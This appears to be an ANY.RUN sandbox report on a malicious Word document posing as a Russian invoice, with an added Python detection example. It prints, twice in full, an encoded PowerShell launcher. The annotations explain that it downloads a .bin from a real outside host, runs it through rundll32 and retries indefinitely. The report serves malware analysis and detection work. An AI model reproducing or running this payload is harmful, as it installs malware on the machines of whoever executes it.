File name: Фактура_28_04_2020.doc (Russian; "Фактура" means "invoice", so the lure poses as an invoice dated 28 April 2020)

Full analysis: https://app.any.run/tasks/65de39f7-efea-4f6d-9251-dd80cd852efa
Verdict: Malicious activity
Analysis date: April 28, 2020, 18:22:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 27 13:51:00 2020, Last Saved Time/Date: Mon Apr 27 13:51:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
MD5:

65B1915A3ACB56FE3C519CA20BCC4142

SHA1:

7A62787C32CC9944F065E91986898E734D2C3591

SHA256:

3D6017419BB155CCF1A7AF49352D4942483D38DB5BE60040A85B72E97F41E176

SSDEEP:

1536:u45B060Bwq977diYcMWfu56MU7kQCJaxrg2oseKOdBxghCn/GvTGiyfPeGDbBezL:zJM0kQiaBeKPCn/mUPRZezj+D

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 1252)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 2444)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 2932)
    • PowerShell script executed

      • powershell.exe (PID: 1252)
      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 2444)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 2932)
      • powershell.exe (PID: 2356)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 1156)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 2904)
      • powershell.exe (PID: 3240)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4004)
    • Manual execution by user

      • powershell.exe (PID: 1252)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2444)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 2932)
      • powershell.exe (PID: 2356)
      • powershell.exe (PID: 1156)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 2904)
      • powershell.exe (PID: 3240)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
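The signatures above are generic (PowerShell executed, files created) and the MALICIOUS list is empty, while the strongest evidence in this report is the shape of the powershell.exe command lines in the process table further down (-nop -exec bypass -win hidden -noni -e <Base64>, parent explorer.exe). The following is an added detection example, not part of the ANY.RUN report and not code from the sample: it scores constructed process-creation events for that launch pattern and for the second stage the decoded payload would produce (rundll32.exe <file>,DllRegisterServer on a .bin in the user profile), which was not observed in this session. The event field names, the weights and the threshold are this example's own assumptions.

```python
"""
Added detection example; not part of the ANY.RUN report and not code from
the sample. Scores process-creation events for the two stages the report's
PowerShell payload describes: the hidden, non-interactive, policy-bypassing,
Base64-encoded powershell.exe launch seen in the process table, and the
rundll32.exe <file>,DllRegisterServer stage the decoded script would run if
the download succeeded. Field names are an assumption, not a product schema.
"""
import re

# Constructed events. The first command line is copied from the report's
# PID 480 row (encoded argument truncated); the other three are made up:
# a benign scheduled script, the hypothetical second stage, a benign rundll32.
EVENTS = [
    {"pid": 480,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAk'},
    {"pid": 5001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Backup\nightly.ps1"},
    {"pid": 5002,
     "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"rundll32.exe" C:\Users\admin\rtsuzllfbjdjl.bin, DllRegisterServer'},
    {"pid": 5003,
     "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# powershell.exe accepts any unambiguous prefix of a switch, which is why the
# sample can spell them -nop -exec -win -noni -e. Weight 0 records the reason
# without letting a common benign switch raise the score on its own.
PS_SWITCHES = [
    (re.compile(r"(?i)\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/]{40,}={0,2}"), 3, "Base64 -EncodedCommand"),
    (re.compile(r"(?i)\s-w(i|in|indowstyle)?\s+hidden"), 1, "hidden window"),
    (re.compile(r"(?i)\s-ex(ec|ecutionpolicy)?\s+(bypass|unrestricted)"), 1, "execution policy bypass"),
    (re.compile(r"(?i)\s-noni(nteractive)?\b"), 1, "non-interactive"),
    (re.compile(r"(?i)\s-nop(rofile)?\b"), 0, "no profile"),
]
INTERACTIVE_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe"}
RUNDLL_REGSVR = re.compile(r'(?i)rundll32(\.exe)?"?\s+"?([^",]+?)"?\s*,\s*DllRegisterServer\b')


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one event; (0, []) means nothing of interest."""
    score, reasons = 0, []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["command_line"]
    if image == "powershell.exe":
        for rx, weight, why in PS_SWITCHES:
            if rx.search(cmd):
                score += weight
                reasons.append(why)
        if parent in INTERACTIVE_PARENTS:
            score += 1
            reasons.append("spawned by " + parent)
    elif image == "rundll32.exe":
        m = RUNDLL_REGSVR.search(cmd)
        if m:
            module = m.group(2).strip()
            # Legitimate DllRegisterServer calls load a .dll from a system or
            # program directory, not an arbitrary file in a user profile.
            if not module.lower().endswith(".dll") or "\\users\\" in module.lower():
                score += 3
                reasons.append("DllRegisterServer on " + module)
    return score, reasons


def detect(events, threshold=3):
    """Events scoring at or above threshold, as (pid, score, reasons)."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["pid"], score, reasons))
    return hits


if __name__ == "__main__":
    for pid, score, reasons in detect(EVENTS):
        print(pid, score, "; ".join(reasons))
```

Run against the four constructed events, only PID 480 (score 7) and the hypothetical rundll32 stage fire; the scheduled script with -NoProfile -ExecutionPolicy Bypass scores 1 and stays below the threshold, which is the point of weighting the encoded-command and hidden-window switches rather than alerting on any single one.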
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:04:27 12:51:00
ModifyDate: 2020:04:27 12:51:00
Pages: 1
Words: -
Characters: 4
Security: None
CodePage: Windows Latin 1 (Western European)
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 4
AppVersion: 15 (the document was produced with Office 2013; the sandbox opened it in Office 14.0 / 2010, per the registry keys written below)
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
All screenshots are available in the full report
Total processes
61
Monitored processes
14
Malicious processes
0
Suspicious processes
0

Behavior graph

start: winword.exe (no specs), followed by 13 powershell.exe instances (no specs). Note that the process table below lists explorer.exe, not WINWORD.EXE, as the parent of every powershell.exe, matching the "Manual execution by user" signature: the PowerShell stage was launched by hand in this session rather than observed spawning from the macro.

Process information (columns: PID | CMD | Path | Indicators | Parent process)

Every powershell.exe row below carries the same command line: -nop -exec bypass -win hidden -noni -e <Base64>, i.e. no profile, execution policy bypassed, hidden window, non-interactive, script supplied as Base64 over UTF-16LE. The long Base64 value is wrapped across several lines by the report layout; join the fragments before decoding. Decoded, the script is a download-and-execute loop padded with dozens of unused string assignments: it downloads http://to4karu.ru/lierhgiojsgiouvbjnkfeiubg.bin with net.webclient.DownloadFile to %USERPROFILE%\rtsuzllfbjdjl.bin, and only if that file is at least 102107 bytes starts rundll32.exe <file>,DllRegisterServer, sleeps 10 s, deletes the file and exits; on any error it sleeps 5 s and retries indefinitely.
480"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQ
BxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZA
BjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
664"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQ
BxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZA
BjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1156"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e 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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
